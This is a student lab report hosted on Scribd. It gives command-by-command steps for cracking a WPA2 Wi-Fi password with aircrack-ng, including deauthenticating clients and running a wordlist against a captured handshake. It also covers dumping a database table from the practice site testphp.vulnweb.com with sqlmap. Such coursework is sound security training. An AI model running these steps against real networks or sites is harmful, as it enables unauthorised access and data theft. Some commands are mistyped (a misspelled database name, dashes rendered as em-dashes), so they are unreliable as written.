Scribd
Upload
34 views9 pages

Graded LAB 2

Uploaded by

aisha.singh69696
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
34 views9 pages

Graded LAB 2

Uploaded by

aisha.singh69696
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Graded LAB 2

Name: Kushagra Ojha Sap I’d: 1000015336

1. Perform Wi-Fi password cracking of WPA-2 Security


enabled and document it well.

Step 1: Check Available Wireless Adapter


● Use the following command to check for available wireless adapters:

iwconfig

Step 2: Put Down the Wireless Adapter

● To prepare the adapter for monitor mode, put it down:

ifconfig wlan0 down

Step 3: Kill Conflicting Processes

● Ensure that no conflicting processes are running:

airmon-ng check kill


Step 4: Change Adapter Mode to Monitor
● Change the mode of your wireless adapter to monitor mode:

iwconfig wlan0 mode monitor

Step 5: Verify Mode Change


● Verify that the mode of your wireless adapter has been changed to
monitor:

iwconfig

Step 6: Enable the Interface


● Finally, bring the interface back up:
ifconfig wlan0 up

Note: Monitor mode allows you to capture network traffic, making it a crucial
step for ethical hacking tasks.
Step 1: Scan for Available Networks
● Use airodump-ng to scan for available networks:
airodump-ng --band abg wlan0

Step 2: Select the Target Network and Capture the WPA Handshake
● Use airodump-ng to capture the WPA handshake for the selected
network. Replace <mac> with the BSSID (MAC address) of the target
network and <channel> with the channel number:
airodump-ng --bssid <mac> --channel <channel> --write lab2 wlan0
Step 4: Deauthenticate Users
● Deauthenticate users on the target network to force a WPA handshake
capture:
aireplay-ng --deauth 0 -a <mac> wlan0

Step 5: Crack the WPA Password


● Use aircrack-ng to attempt to crack the captured WPA handshake using
a wordlist (replace <wordlist> with the path to your wordlist file):
aircrack-ng lab2-01.cap -w <wordlist>
Note: The wordlist should contain potential passwords to try for cracking the
WPA key.

This documentation outlines the steps involved in capturing a WPA


handshake and attempting to crack the password. Make sure to replace
<mac>, <channel>, and <wordlist> with the actual values you used during your
task.

2. Dump all the data over artists (vulnweb.com) and document


them properly.

Step 1 . Execute SQLMap to Discover Databases


● Execute SQLMap with the target URL to identify databases on the target
server:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=3" --dbs


● As you can see from the result there is only one database so we will change
the target to http://testphp.vulnweb.com/listproducts.php?cat=1
● We will do the previous step again on
http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

● As you can see we have two databases that are acuart,


information_schema.
● We are going to check acurat

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –D
acurat --tables
● In the above D stands for database and in that database we are going
to check for all the tables

● As we can see tables in the database acurat now we are going to


check the table artists, Now we check for columns in table artists

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acurat -T artists ——columns
● Now we know the database, tables in that database, and all the columns in
that table we dump all the data.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acurat


-T artists -C adesc,aname,artist_id, —— dump

You might also like